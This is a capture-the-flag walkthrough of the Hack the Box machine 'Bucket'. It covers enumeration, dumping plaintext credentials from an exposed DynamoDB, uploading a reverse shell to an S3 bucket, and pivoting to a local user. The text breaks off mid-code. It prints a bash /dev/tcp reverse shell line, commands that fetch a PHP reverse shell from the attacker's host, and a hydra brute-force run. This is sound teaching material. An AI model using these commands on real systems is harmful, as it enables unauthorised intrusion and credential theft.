HTB - Bucket

Overview

This medium difficulty Linux machine by MrR3boot on Hack the Box was very interesting and quite relevant in today’s cloud-centric world. Many websites these days are hosted and run from AWS, and use AWS S3 buckets as data storage. This machine explores how misconfigurations and improper security for user credentials can lead to total compromise of the server that hosts the site. Since DynamoDB can be hosted locally as well as in the cloud, the server that was compromised in this case was the local machine on the internal network.

Useful Skills and Tools

Upgrade to a fully interactive reverse shell

#On victim machine

python3 -c 'import pty;pty.spawn("/bin/bash")'; #spawn python pseudo-shell

ctrl-z #send to background

#On attacker's machine

stty raw -echo # https://stackoverflow.com/questions/22832933/what-does-stty-raw-echo-do-on-os-x

stty -a #get local number of rows & columns

fg #to return shell to foreground

#On victim machine

export SHELL=bash

stty rows $x columns $y #Set remote shell to x number of rows & y columns

export TERM=xterm-256color #allows you to clear console, and have color output
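The rows and columns that stty -a reports can also be read programmatically. The following is a minimal Python sketch, not part of the original workflow, that prints the matching stty command to paste into the remote shell. The helper name stty_command is made up for illustration.

```python
import shutil


def stty_command(columns: int, rows: int) -> str:
    """Build the command that resizes the remote pseudo-terminal."""
    return f"stty rows {rows} columns {columns}"


# Query the local terminal; fall back to 80x24 when no terminal is attached.
size = shutil.get_terminal_size(fallback=(80, 24))
print(stty_command(size.columns, size.lines))
```

Run this on the attacker's machine before backgrounding the shell, then paste the printed command into the remote session.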

Enumeration

Nmap scan

I started my enumeration with an nmap scan of 10.10.10.212. The options I regularly use are:

| Flag | Purpose |
|---|---|
| -p- | A shortcut which tells nmap to scan all ports |
| -vvv | Gives very verbose output so I can see the results as they are found, and also includes some information not normally shown |
| -sC | Equivalent to --script=default and runs a collection of nmap enumeration scripts against the target |
| -sV | Does a service version scan |
| -oA $name | Saves all three formats (standard, greppable, and XML) of output with a filename of $name |

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ nmap -sCV -n -p- -Pn -v -oA bucket 10.10.10.212

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)

| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)

|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)

80/tcp open http Apache httpd 2.4.41

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: Did not follow redirect to http://bucket.htb/

Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 248.46 seconds

My nmap scan showed that there were only two TCP ports open on this machine: 22 - SSH and 80 - HTTP.

Port 80 - HTTP



I navigated to the IP address in my web browser to see what might be hosted over HTTP but was redirected to bucket.htb, which I added to my /etc/hosts file.



There, I found an advertising platform that sold information security-related advertisements. There was no useful information on the site other than the email address support@bucket.htb.



However, in the source code of the page I found a reference to an s3 subdomain where the articles were hosted. I added this subdomain to my /etc/hosts file as well.


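Spotting extra hostnames in page source can be automated. The sketch below is one hedged way to do it in Python: it pulls absolute URLs out of src and href attributes and reports the distinct hostnames. The function name find_hosts and the sample markup are illustrative assumptions; only the image URL itself comes from this site.

```python
import re
from urllib.parse import urlparse


def find_hosts(html: str) -> set:
    """Return the distinct hostnames referenced by src/href attributes."""
    urls = re.findall(r'(?:src|href)=["\'](https?://[^"\']+)', html)
    return {urlparse(url).hostname for url in urls}


# Hypothetical snippet of page source containing the image link.
sample = '<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug">'
print(sorted(find_hosts(sample)))
```

Any hostname that turns up this way still has to be added to /etc/hosts by hand before it resolves.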

Next I navigated to s3.bucket.htb, which led to a page with JSON output that simply said {"status": "running"}. Since there was nothing else there, I fired up gobuster to see if I could find any directories.

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ gobuster dir -u http://s3.bucket.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -t 20 -k

===============================================================

Gobuster v3.0.1

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)

===============================================================

[+] Url: http://s3.bucket.htb

[+] Threads: 20

[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt

[+] Status codes: 200,204,301,302,307,401,403

[+] User Agent: gobuster/3.0.1

[+] Timeout: 10s

===============================================================

2021/02/16 20:36:05 Starting gobuster

===============================================================

/shell (Status: 200)

/health (Status: 200)

/server-status (Status: 403)

[ERROR] 2021/02/16 20:39:28 [!] parse http://s3.bucket.htb/error_log: net/url: invalid control character in URL

===============================================================

2021/02/16 20:45:21 Finished

===============================================================



The first one I tried out was the directory /health. This page showed that two services were up and running: S3 and DynamoDB.



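The other result that came up was /shell, which I navigated to. This redirected me to http://444af250749d:4566/shell/. The hostname looked hex-encoded, and decoding its last four bytes gave the IP 242.80.116.157. I didn’t feel like this was right, so I killed the connection. It seemed like either a misconfiguration, or someone trying to compromise other players’ machines. In hindsight, a 12-character hex hostname is also the default format for a Docker container hostname, which would fit a containerized service better than an encoded IP.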


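As a quick check of that decoding, the Python sketch below converts the redirect hostname into raw bytes. The string holds six bytes, and only the last four correspond to the address mentioned above, so reading it as an IP is an interpretation rather than a certainty. The helper name hex_to_octets is invented for this example.

```python
def hex_to_octets(hex_string: str) -> list:
    """Decode a hex string into a list of integer byte values."""
    return list(bytes.fromhex(hex_string))


octets = hex_to_octets("444af250749d")
# Join the final four bytes in dotted-decimal form, as an IPv4 address would be written.
last_four = ".".join(str(octet) for octet in octets[-4:])
print(len(octets), last_four)
```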

I checked out what the request to this URL looked like in Burp Suite, and noticed that it was talking to a hypercorn-h11 server. The response also showed that potentially dangerous HTTP methods such as PUT and DELETE were allowed.



The Headers tab for the /health endpoint showed the same hypercorn server information that I had seen in Burp for the odd /shell redirect. I decided to keep poking at it to see if I could get anything useful from it, since it did not seem to actually be something malicious.



I tried typing a / after /shell, which caused the page to go to an AWS DynamoDB shell page. This looked to be more likely what I wanted.

- https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Tools.CLI.html

- https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/WorkingWithTables.Basics.html

- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/dynamodb/index.html

- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/index.html

I tried using the documentation to figure out how to get some useful information out of the web shell.

There was a tutorial mode that I tried to follow along with, but the web console did not seem to work. I tried installing and using the AWS CLI instead.

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/shell/ --no-paginate --no-sign-request

You must specify a region. You can also configure your region by running "aws configure".

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/shell/ --no-paginate --no-sign-request --region

To see help text, you can run:

aws help

aws <command> help

aws <command> <subcommand> help

usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]

aws: error: argument --region: expected one argument

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/shell/ --no-paginate --no-sign-request --region bucket

{

"TableNames": [

"Image",

"Tag",

"users"

]

}

It took a bit more reading to figure out how to use the CLI with DynamoDB, and how to connect to the remote endpoint. After getting all of the options set correctly, I found that there were three tables in the database. I had created two of them while playing around with the tutorial, but the third, users, was already there.

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws dynamodb scan users --endpoint-url http://s3.bucket.htb/shell/ --no-paginate --no-sign-request --region bucket

To see help text, you can run:

aws help

aws <command> help

aws <command> <subcommand> help

usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]

aws: error: the following arguments are required: --table-name

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/shell/ --no-paginate --no-sign-request --region bucket

{

"Items": [

{

"password": {

"S": "Management@#1@#"

},

"username": {

"S": "Mgmt"

}

},

{

"password": {

"S": "Welcome123!"

},

"username": {

"S": "Cloudadm"

}

},

{

"password": {

"S": "n2vM-<_K_Q:.Aa2"

},

"username": {

"S": "Sysadm"

}

}

],

"Count": 3,

"ScannedCount": 3

}

Thankfully the error messages I got while learning this tool were verbose enough that it was fairly easy to correct my mistakes and move on. After figuring out how to pull data from the table, I found that it contained three username/password combinations.

- Mgmt : Management@#1@#
- Cloudadm : Welcome123!
- Sysadm : n2vM-<_K_Q:.Aa2
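DynamoDB wraps every attribute in a type descriptor (here "S" for string), so the scan output needs a little unwrapping before it can be used as a credential list. The following Python sketch shows one way to do that with the JSON returned above; the function name extract_credentials is an assumption made for this example.

```python
import json

# The JSON returned by the scan of the users table.
scan_output = """
{
  "Items": [
    {"password": {"S": "Management@#1@#"}, "username": {"S": "Mgmt"}},
    {"password": {"S": "Welcome123!"}, "username": {"S": "Cloudadm"}},
    {"password": {"S": "n2vM-<_K_Q:.Aa2"}, "username": {"S": "Sysadm"}}
  ],
  "Count": 3,
  "ScannedCount": 3
}
"""


def extract_credentials(raw: str) -> list:
    """Unwrap the DynamoDB string attributes into (username, password) pairs."""
    items = json.loads(raw)["Items"]
    return [(item["username"]["S"], item["password"]["S"]) for item in items]


for username, password in extract_credentials(scan_output):
    print(f"{username} : {password}")
```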

I had no idea yet what to do with these credentials, however.

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ hydra -l users -P passwords 10.10.10.212 ssh

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-17 14:49:29

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task

[DATA] attacking ssh://10.10.10.212:22/

1 of 1 target completed, 0 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-17 14:49:33

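I tried to use the credentials to SSH in with hydra, but none of them worked. Note that the lowercase -l option passes a single literal login name, so this run only tested the username users against the three passwords, as the l:1/p:3 in the output shows; -L is the option that reads logins from a file. I then did a bit more research on DynamoDB.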

- https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/EMRforDynamoDB.CopyingData.S3.html

- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3/index.html

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws s3 ls --endpoint-url http://s3.bucket.htb

2021-02-18 19:12:03 adserver

I found a way to list the S3 buckets that existed on the server and checked it out. I noticed that the one bucket that came up, adserver, was the name of the site I originally saw on port 80. It seemed likely that this was the backend storage for that site.

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws s3 ls --endpoint-url http://s3.bucket.htb adserver

PRE images/

2021-02-18 19:20:02 5344 index.html

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws s3 cp --endpoint-url http://s3.bucket.htb adserver .

usage: aws s3 cp <LocalPath> <S3Uri> or <S3Uri> <LocalPath> or <S3Uri> <S3Uri>

Error: Invalid argument type

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws s3 cp --endpoint-url http://s3.bucket.htb s3://adserver .

┌──(zweilos㉿kali)-[~/htb/reel2]

└─$ aws s3 cp --endpoint-url http://s3.bucket.htb s3://adserver . --recursive

download: s3://adserver/index.html to ./index.html

download: s3://adserver/images/bug.jpg to images/bug.jpg

download: s3://adserver/images/malware.png to images/malware.png

download: s3://adserver/images/cloud.png to images/cloud.png

I was able to download the files from the S3 bucket using the CLI. After reviewing them, I found that they were just the code and images for the site hosted on port 80. Since I was able to download files, I wondered if I was able to upload files as well. If so, I could upload a web shell, since I knew where to access the files.



I initially tried finding my PHP shell at http://bucket.htb/php-code-exec.php, but then I remembered that the link I had found in the page’s source code was http://s3.bucket.htb/adserver/images/bug.jpg, so the s3 subdomain should be where my file was uploaded. Unfortunately it appeared as if PHP code was not executable on this server.

- https://docs.aws.amazon.com/systems-manager/latest/userguide/walkthrough-cli.html

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws ssm describe-instance-information \

--output text --query "InstanceInformationList[*]" --endpoint-url http://s3.bucket.htb

None

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws ssm send-command \

--document-name "AWS-RunShellScript" \

--endpoint-url http://s3.bucket.htb \

--parameters '{"commands":["#!/bin/bash","echo test"]}'

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws ssm send-command \

--document-name "AWS-RunShellScript" \

--endpoint-url http://s3.bucket.htb \

--parameters '{"commands":["#!/bin/bash","curl http://10.10.15.13:8081/php-reverse-shell.php"]}'

I found a page that talked about executing shell scripts using the AWS CLI, but it did not seem to do anything in my tests on this server.

#!/bin/bash

bash -c 'bash -i >& /dev/tcp/10.10.15.13/8090 0>&1'

Since PHP did not seem to execute, I decided to try uploading a bash reverse shell instead.

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws s3 cp --endpoint-url http://s3.bucket.htb ./test.sh s3://adserver

upload: ./test.sh to s3://adserver/test.sh

I uploaded it to the server.

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws ssm send-command \

--document-name "AWS-RunRemoteScript" \

--targets "Key=instanceids,Values=adserver" \

--parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"http://s3.bucket.htb/adserver/test.sh\"}"],"commandLine":["test.sh"]}' --endpoint-url http://s3.bucket.htb

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws ssm send-command \

--document-name "AWS-RunRemoteScript" \

--targets "Key=instanceids,Values=adserver" \

--parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"s3://adserver/test.sh\"}"],"commandLine":["test.sh"]}' --endpoint-url http://s3.bucket.htb

- https://docs.aws.amazon.com/systems-manager/latest/userguide/integration-s3-shell.html

I had found this page that seemed to talk about running shell scripts, but uploading and running my reverse shell on the server failed as well.

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws s3 cp --endpoint-url http://s3.bucket.htb ~/php-code-exec.php s3://adserver

upload: ../../php-code-exec.php to s3://adserver/php-code-exec.php

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/

PRE images/

2021-03-14 19:33:04 5344 index.html

2021-03-14 19:34:18 42 php-code-exec.php

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/

PRE images/

2021-03-14 19:35:04 5344 index.html

Since the initial upload folder did not allow me to execute PHP, I tried uploading it to another folder using directory traversal. The folder was cleaned up quickly, though, so I had to keep trying to get my reverse shell to execute.

Initial Foothold

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ script

Script started, output log file is 'typescript'.

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ bash

zweilos@kali:~/htb/bucket$ nc -lvnp 8090

listening on [any] 8090 ...

connect to [10.10.14.158] from (UNKNOWN) [10.10.10.212] 47228

Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

23:52:03 up 3:08, 0 users, load average: 1.59, 6.00, 4.19

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$ python -c 'import pty;pty.spawn("/bin/bash")'

/bin/sh: 1: python: not found

$ which python3

/usr/bin/python3

$ ptyhon3 -c 'import pty;pty.spawn("/bin/bash")'

/bin/sh: 3: ptyhon3: not found

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@bucket:/$ ^Z

[1]+ Stopped nc -lvnp 8090

zweilos@kali:~/htb/bucket$ stty raw -echo

speed 38400 baud; rows 46; columns 103; line = 0;

intr = ^C; quit = ^\; erase = ^H; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>;

start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;

znc -lvnp 8090a:~/htb/bucket$

www-data@bucket:/$ stty rows 46 columns 103

www-data@bucket:/$ export TERM=xterm-256color

However, my patience paid off and I was able to get a shell back on my waiting listener. I quickly upgraded to a full shell using python3 and began looking around. I started out in the root directory of the machine, which was a bit strange as I was logged in as the user www-data.

www-data@bucket:/$ ls -la

total 80

drwxr-xr-x 21 root root 4096 Feb 10 12:49 .

drwxr-xr-x 21 root root 4096 Feb 10 12:49 ..

drwxr-xr-x 2 root root 4096 Sep 23 03:18 .aws

lrwxrwxrwx 1 root root 7 Apr 23 2020 bin -> usr/bin

drwxr-xr-x 3 root root 4096 Oct 2 09:23 boot

drwxr-xr-x 2 root root 4096 May 7 2020 cdrom

drwxr-xr-x 17 root root 3920 Mar 14 20:44 dev

drwxr-xr-x 107 root root 4096 Feb 10 12:51 etc

drwxr-xr-x 3 root root 4096 Sep 16 12:59 home

lrwxrwxrwx 1 root root 7 Apr 23 2020 lib -> usr/lib

lrwxrwxrwx 1 root root 9 Apr 23 2020 lib32 -> usr/lib32

lrwxrwxrwx 1 root root 9 Apr 23 2020 lib64 -> usr/lib64

lrwxrwxrwx 1 root root 10 Apr 23 2020 libx32 -> usr/libx32

drwx------ 2 root root 16384 May 7 2020 lost+found

drwxr-xr-x 2 root root 4096 Apr 23 2020 media

drwxr-xr-x 2 root root 4096 Apr 23 2020 mnt

drwxr-xr-x 3 root root 4096 Sep 16 10:28 opt

dr-xr-xr-x 243 root root 0 Mar 14 20:43 proc

drwx------ 11 root root 4096 Sep 24 04:09 root

drwxr-xr-x 30 root root 920 Mar 14 20:44 run

lrwxrwxrwx 1 root root 8 Apr 23 2020 sbin -> usr/sbin

drwxr-xr-x 6 root root 4096 May 7 2020 snap

drwxr-xr-x 2 root root 4096 Apr 23 2020 srv

dr-xr-xr-x 13 root root 0 Mar 14 20:44 sys

drwxrwxrwt 2 root root 4096 Mar 14 23:29 tmp

drwxr-xr-x 14 root root 4096 Apr 23 2020 usr

drwxr-xr-x 14 root root 4096 Feb 10 12:29 var

www-data@bucket:/$ cd .aws

www-data@bucket:/.aws$ ls -la

total 16

drwxr-xr-x 2 root root 4096 Sep 23 03:18 .

drwxr-xr-x 21 root root 4096 Feb 10 12:49 ..

-rw------- 1 root root 22 Sep 16 13:13 config

-rw------- 1 root root 64 Sep 16 10:57 credentials

In the root I noticed that there was a hidden .aws directory, which had two interesting looking files inside. However, these were both owned by root.

www-data@bucket:/.aws$ cd /home

www-data@bucket:/home$ ls -la

total 12

drwxr-xr-x 3 root root 4096 Sep 16 12:59 .

drwxr-xr-x 21 root root 4096 Feb 10 12:49 ..

drwxr-xr-x 3 roy roy 4096 Sep 24 03:16 roy

www-data@bucket:/home$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin

systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin

systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin

messagebus:x:103:106::/nonexistent:/usr/sbin/nologin

syslog:x:104:110::/home/syslog:/usr/sbin/nologin

_apt:x:105:65534::/nonexistent:/usr/sbin/nologin

tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false

uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin

tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin

landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin

pollinate:x:110:1::/var/cache/pollinate:/bin/false

sshd:x:111:65534::/run/sshd:/usr/sbin/nologin

systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin

roy:x:1000:1000:,,,:/home/roy:/bin/bash

There was a user named roy on this machine who could log in and had a folder under /home. I wondered if any of the passwords I found earlier would work for him.
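Picking the accounts with a real login shell out of /etc/passwd is easy to script. The sketch below is a rough Python illustration using a few lines copied from the output above. It treats any shell path ending in "sh" as interactive, which is a simplifying assumption, and the function name login_users is made up.

```python
# A few representative lines from the /etc/passwd output.
passwd_sample = """\
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
roy:x:1000:1000:,,,:/home/roy:/bin/bash
"""


def login_users(passwd_text: str) -> list:
    """Return account names whose shell field looks like an interactive shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        name, shell = fields[0], fields[6]
        if shell.endswith("sh"):  # heuristic: bash, sh, zsh, dash, ...
            users.append(name)
    return users


print(login_users(passwd_sample))
```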

Finding user creds

www-data@bucket:/home$ su roy

Password:

su: Authentication failure

www-data@bucket:/home$ su roy

Password:

su: Authentication failure

www-data@bucket:/home$ su roy

Password:

roy@bucket:/home$ id

uid=1000(roy) gid=1000(roy) groups=1000(roy),1001(sysadm)

The first two passwords didn’t work, but the third (n2vM-<_K_Q:.Aa2) let me switch to the user roy. Roy was a member of the sysadm group which was very interesting.

roy@bucket:/home$ sudo -l

[sudo] password for roy:

Sorry, user roy may not run sudo on bucket.

Unfortunately roy was not able to run sudo on this machine.

User.txt

roy@bucket:/home$ cd roy

roy@bucket:~$ ls -la

total 28

drwxr-xr-x 3 roy roy 4096 Sep 24 03:16 .

drwxr-xr-x 3 root root 4096 Sep 16 12:59 ..

lrwxrwxrwx 1 roy roy 9 Sep 16 12:59 .bash_history -> /dev/null

-rw-r--r-- 1 roy roy 220 Sep 16 12:59 .bash_logout

-rw-r--r-- 1 roy roy 3771 Sep 16 12:59 .bashrc

-rw-r--r-- 1 roy roy 807 Sep 16 12:59 .profile

drwxr-xr-x 3 roy roy 4096 Sep 24 03:16 project

-r-------- 1 roy roy 33 Mar 14 20:44 user.txt

roy@bucket:~$ cat user.txt

94cb50c7a89bf4dd549ffa4df5768156

He was, however, the owner of the user flag!

Path to Power (Gaining Administrator Access)

Enumeration as roy

<?php

require 'vendor/autoload.php';

date_default_timezone_set('America/New_York');

use Aws\DynamoDb\DynamoDbClient;

use Aws\DynamoDb\Exception\DynamoDbException;

$client = new Aws\Sdk([

'profile' => 'default',

'region' => 'us-east-1',

'version' => 'latest',

'endpoint' => 'http://localhost:4566'

]);

$dynamodb = $client->createDynamoDb();

//todo

There was a db.php file in the project folder. The file composer.lock also held the version numbers of all of the packages for the AWS SDK for PHP. It reported the main version as , which was old.

- https://github.com/aws/aws-sdk-php/blob/master/CHANGELOG.md

There did not seem to be any vulnerabilities that I could see in the changelogs. I decided to look more into the DynamoDB client that was being created in that db.php file. It pointed at an endpoint on port 4566, which had not shown up on my initial nmap scan, so I checked to see if anything was listening there.

roy@bucket:~/project/vendor/bin$ netstat -tulvnp

(Not all processes could be identified, non-owned process info

will not be shown, you would have to be root to see it all.)

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:41703 0.0.0.0:* LISTEN -

tcp6 0 0 :::80 :::* LISTEN -

tcp6 0 0 :::22 :::* LISTEN -

udp 0 0 127.0.0.53:53 0.0.0.0:*

When I checked the ports that were open with netstat I noticed that there were a few ports open internally that I had not seen in my initial nmap scan: 4566, 8000, and 41703.
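The same comparison can be scripted. As a hedged illustration, the Python sketch below parses netstat output like the listing above and returns the TCP ports that listen only on loopback addresses, which are the ones an external nmap scan cannot see. The function name local_only_ports is an assumption, and the parser expects the column layout shown here.

```python
# Listening sockets copied from the netstat output above.
netstat_sample = """\
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:41703 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:*
"""


def local_only_ports(netstat_text: str) -> list:
    """Return sorted TCP ports that are listening on a 127.x.x.x address only."""
    ports = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6") or parts[5] != "LISTEN":
            continue
        host, _, port = parts[3].rpartition(":")
        if host.startswith("127."):
            ports.add(int(port))
    return sorted(ports)


print(local_only_ports(netstat_sample))
```

Port 53 also shows up in the result because the local DNS stub listens on 127.0.0.53. The interesting ones remain 4566, 8000, and 41703.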

roy@bucket:~/project/vendor/bin$ curl http://localhost:4566

{"status": "running"}

Using curl to connect to port 4566 simply gave a json response that said that something was running.

<!DOCTYPE html>

<html lang="en" >

<head>

<meta charset="UTF-8">

<title>We are not ready yet!</title>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">

<style>

...snipped excess CSS code...

</style>

<script>

window.console = window.console || function(t) {};

</script>

<script>

if (document.location.search.match(/type=embed/gi)) {

window.parent.postMessage("resize", "*");

}

</script>

</head>

<body translate="no" >

<main>

<section class="advice">

<h1 class="advice__title">Site under construction or maintenance </h1>

<p class="advice__description"><span><</span> Bucket Application <span>/></span> not finished yet</p>

</section>

<section class="city-stuff">

...snipped excess lists...

</section>

</main>

<script src="https://static.codepen.io/assets/common/stopExecutionOnTimeout-157cd5b220a5c80d4ff8e0e70ac069bffd87a61252088146915e8726e5d9f147.js"></script>

<script id="rendered-js" >

// ¯\_(ツ)_/¯ I told you that there was no JS

//# sourceURL=pen.js

</script>

</body>

</html>

Port 8000, however, hosted a website for a Bucket Application that was still under construction. There was an interesting comment at the bottom that said “I told you that there was no JS”, followed by a commented-out sourceURL reference to pen.js.

roy@bucket:~$ find / -name pen.js 2>/dev/null

roy@bucket:~$

I was curious, so I searched for the file pen.js to see what it was, but it didn’t seem to exist.

roy@bucket:/var$ cd www

roy@bucket:/var/www$ ls -la

total 16

drwxr-xr-x 4 root root 4096 Feb 10 12:29 .

drwxr-xr-x 14 root root 4096 Feb 10 12:29 ..

drwxr-x---+ 4 root root 4096 Feb 10 12:29 bucket-app

drwxr-xr-x 2 root root 4096 Mar 15 00:37 html

roy@bucket:/var/www$ cd bucket-app/

roy@bucket:/var/www/bucket-app$ ls -la

total 856

drwxr-x---+ 4 root root 4096 Feb 10 12:29 .

drwxr-xr-x 4 root root 4096 Feb 10 12:29 ..

-rw-r-x---+ 1 root root 63 Sep 23 02:23 composer.json

-rw-r-x---+ 1 root root 20533 Sep 23 02:23 composer.lock

drwxr-x---+ 2 root root 4096 Mar 15 00:09 files

-rwxr-x---+ 1 root root 17222 Sep 23 03:32 index.php

-rwxr-x---+ 1 root root 808729 Jun 10 2020 pd4ml_demo.jar

drwxr-x---+ 10 root root 4096 Feb 10 12:29 vendor

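I did some manual enumeration of the www directory to see if I could find what was hosted on port 8000, and found another page’s files in the bucket-app directory. These were all owned by root, which was odd. The + at the end of each permission string indicates that extended ACLs were set, which is presumably why roy could still read them.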

<?php

require 'vendor/autoload.php';

use Aws\DynamoDb\DynamoDbClient;

if($_SERVER["REQUEST_METHOD"]==="POST") {

if($_POST["action"]==="get_alerts") {

date_default_timezone_set('America/New_York');

$client = new DynamoDbClient([

'profile' => 'default',

'region' => 'us-east-1',

'version' => 'latest',

'endpoint' => 'http://localhost:4566'

]);

$iterator = $client->getIterator('Scan', array(

'TableName' => 'alerts',

'FilterExpression' => "title = :title",

'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),

));

foreach ($iterator as $item) {

$name=rand(1,10000).'.html';

file_put_contents('files/'.$name,$item["data"]);

}

passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");

}

}

else

{

